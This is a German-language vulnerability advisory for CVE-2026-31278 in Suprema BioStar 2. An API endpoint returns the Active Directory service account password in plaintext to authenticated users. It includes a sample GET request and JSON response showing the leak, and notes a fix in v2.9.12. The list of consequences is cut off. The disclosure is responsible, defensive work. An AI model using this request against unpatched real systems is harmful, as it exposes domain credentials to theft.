
CVE-Write-up zur Sicherheitslücke bei der Offenlegung von Active-Directory-Anmeldedaten in Suprema BioStar 2
| Feld | Details |
|---|
| CVE-Kennung | CVE-2026-31278 |
| Anbieter | Suprema Inc. |
| Produkt | BioStar 2 |
| Schwachstellentyp | Offenlegung sensibler Informationen / Offenlegung von Anmeldeinformationen |
| Angriffsvektor | Remote / Authentifiziert / Geringe Komplexität |
| Schweregrad | Hoch |
| Behoben in | BioStar 2 v2.9.12 / BioStarX v1.0.2 |
| Forscher | Abdullah Alannaz |
In Suprema BioStar 2 besteht eine Schwachstelle zur Offenlegung sensibler Informationen aufgrund unsachgemäßer Handhabung der Integrationsoptionen für Active Directory. Der Backend-API-Endpunkt /api/v2/setting/adserversetting gibt die Anmeldeinformationen des Active-Directory-Bind-Kontos im Klartext zurück, obwohl das Passwort in der Verwaltungsoberfläche maskiert wird.
Obwohl das Passwortfeld in der Verwaltungsoberfläche maskiert ist, geben authentifizierte Anfragen an die Backend-API das vollständige unverschlüsselte Passwort zusammen mit den LDAP-Konfigurationsparametern einschließlich der deaktivierten SSL-Kommunikation preis.
Ein authentifizierter Angreifer sendet eine HTTP-GET-Anfrage an den AD-Server-Konfigurationsendpunkt und erhält im Rahmen der Serverantwort das Passwort des Active-Directory-Dienstkontos im Klartext.
Anfrage:
GET /api/v2/setting/adserversetting HTTP/1.1
Host: <target>
Authorization: Bearer <token>
Antwort:
{
"ad_server": "ldap://internal.domain.local",
"bind_dn": "CN=svc_biostar,DC=domain,DC=local",
"password": "<plaintext_password_returned_here>",
"ssl_enabled": false
}
Ein authentifizierter Angreifer kann die offengelegten Anmeldeinformationen nutzen, um:
CVE-2026-31278 von MITRE vergeben | Fix veröffentlicht in BioStar 2 v2.9.12 / BioStarX v1.0.2 |
Abdullah Alannaz Sicherheitsforscher
Diese Schwachstelle wurde Suprema verantwortungsvoll gemeldet. Der Anbieter bestätigte das Problem und stimmte sich mit MITRE bezüglich der CVE-Vergabe ab.